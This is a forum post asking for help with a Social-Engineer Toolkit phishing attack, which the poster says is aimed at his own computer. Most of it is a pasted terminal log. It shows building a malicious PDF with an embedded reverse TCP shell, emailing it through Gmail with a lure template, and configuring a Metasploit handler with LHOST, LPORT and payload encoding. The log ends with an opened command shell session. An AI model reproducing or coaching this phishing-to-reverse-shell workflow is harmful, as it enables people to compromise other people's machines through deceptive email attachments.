Hello all,
I am trying to get remote access to my main computer on my network using the SET email attack.
However, when I open the PDF I do not get command line access!
See below:
Thanks in advance for the advice.
yoma
Code:
                 .M"""bgd `7MM"""YMM MMP""MM""YMM
                ,MI    "Y   MM    `7 P'   MM   `7
                `MMb.       MM   d        MM
                  `YMMNq.   MMmmMM        MM
                .     `MM   MM   Y  ,     MM
                Mb     dM   MM     ,M     MM
                P"Ybmmd"  .JMMmmmmMMM   .JMML.

  [---]       The Social-Engineer Toolkit (SET)          [---]
  [---]         Written by David Kennedy (ReL1K)         [---]
  [---]                 Version: 0.4.1                   [---]
  [---]      Codename: 'Rise of the Pink Pirate'         [---]
  [---]     Report bugs to: davek@social-engineer.org    [---]
  [---]      Check out: http://social-engineer.org       [---]
  [---]        Homepage: http://www.secmaniac.com        [---]
  [---] Tutorial: http://offsec.com/metasploit-unleashed [---]
  [---]      Unpublished Java Applet by: Thomas Werth    [---]

Welcome to the Social-Engineer Toolkit (SET). Your one
stop shop for all of your social-engineering needs..

Select from the menu on what you would like to do:

1. Spear-Phishing (Email) Attacks
2. Website Attack Vectors
3. Update the Metasploit Framework
4. Update the Social-Engineer Toolkit
5. Create a Payload and Listener
6. Help, Credits, and About
7. Exit the Social-Engineer Toolkit

Enter your choice: 1

Welcome to the SET E-Mail attack method. This module allows you
to specially craft email messages and send them to a large (or small)
number of people with attached fileformat malicious payloads. If you
want to spoof your email address, be sure "Sendmail" is installed (it
is installed in BT4) and change the config/set_config SENDMAIL=OFF flag
to SENDMAIL=ON.

There are two options, one is getting your feet wet and letting SET do
everything for you (option 1), the second is to create your own FileFormat
payload and use it in your own attack. Either way, good luck and enjoy!

1. Perform a Mass Email Attack
2. Create a FileFormat Payload
3. Create a Social-Engineering Template
4. Return to Main Menu.

Enter your choice: 1

Select the file format exploit you want.
The default is the PDF embedded EXE.

        ********** PAYLOADS **********

1. Adobe Collab.collectEmailInfo Buffer Overflow
2. Adobe Collab.getIcon Buffer Overflow
3. Adobe JBIG2Decode Memory Corruption Exploit
4. Adobe PDF Embedded EXE Social Engineering
5. Adobe util.printf() Buffer Overflow
6. Custom EXE to VBA (sent via RAR) (RAR required)
7. Adobe U3D CLODProgressiveMeshDeclaration Array Overrun

Enter the number you want (press enter for default): 4
You have selected the default payload creation. SET will generate a normal PDF with embedded EXE.

1. Windows Reverse TCP Shell
2. Windows Meterpreter Reverse_TCP
3. Windows Reverse VNC
4. Windows Reverse TCP Shell (x64)
5. Windows Meterpreter Reverse_TCP (X64)
6. Windows Shell Bind_TCP (X64)

Enter the payload you want (press enter for default): 1
Enter the port to connect back on (press enter for default):
[*] Defaulting to port 443...
[*] Generating fileformat exploit...
[*] Please wait while we load the module tree...
[*] Started reverse handler on 192.168.1.3:443
[*] Reading in 'src/msf_attacks/form.pdf'...
[*] Parsing 'src/msf_attacks/form.pdf'...
[*] Parsing Successful.
[*] Using 'windows/shell_reverse_tcp' as payload...
[*] Creating 'template.pdf' file...
[*] Generated output file /pentest/exploits/SET/src/program_junk/template.pdf
[*] Payload creation complete.
[*] All payloads get sent to the src/msf_attacks/template.pdf directory
[*] Payload generation complete. Press enter to continue.


As an added bonus, use the file-format creator in SET to create your attachment.

Right now the attachment will be imported with filename of 'template.whatever'

Do you want to rename the file?

example Enter the new filename: moo.pdf

1. Keep the filename, I don't care.
2. Rename the file, I want to be cool.

Enter your choice (enter for default): 1
Keeping the filename and moving on.

Social Engineer Toolkit Mass E-Mailer

There are two options on the mass e-mailer, the first would
be to send an email to one indivdual person. The second option
will allow you to import a list and send it to as many people as
you want within that list.

What do you want to do:

1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer
3. Return to main menu.

Enter your choice: 1

Do you want to use a predefined template or craft
a one time email template.

1. Pre-Defined Template
2. One-Time Use Email Template

Enter your choice: 1
Below is a list of available templates:

1: LOL...have to check this out...
2: Dan Brown's Angels & Demons
3: Baby Pics
4: New Update
5: Computer Issue
6: Status Report
7: Strange internet usage from your computer

Enter the number you want to use: 1

Enter who you want to send email to:(my email)

What option do you want to use?

1. Use a GMAIL Account for your email attack.
2. Use your own server or open relay

Enter your choice: 1
Enter your GMAIL email address: (same email again)
Enter your password for gmail (it will not be displayed back to you):


SET has finished deliverying the emails.

Do you want to setup a listener yes or no: yes

                                  _       _
             _                   | |     (_)_
 ____   ____| |_  ____  ___ ____ | | ___  _| |_
|    \ / _  )  _)/ _  |/___)  _ \| |/ _ \| |  _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
                           |_|


       =[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 535 exploits - 254 auxiliary
+ -- --=[ 198 payloads - 23 encoders - 8 nops
       =[ svn r8859 updated today (2010.03.20)

resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 192.168.1.3
LHOST => 192.168.1.3
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set ENCODING shikata_ga_nai
ENCODING => shikata_ga_nai
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.3:443
[*] Starting the payload handler...
msf exploit(handler) >
[*] Command shell session 1 opened (192.168.1.3:443 -> 192.168.1.4:3768)

msf exploit(handler) >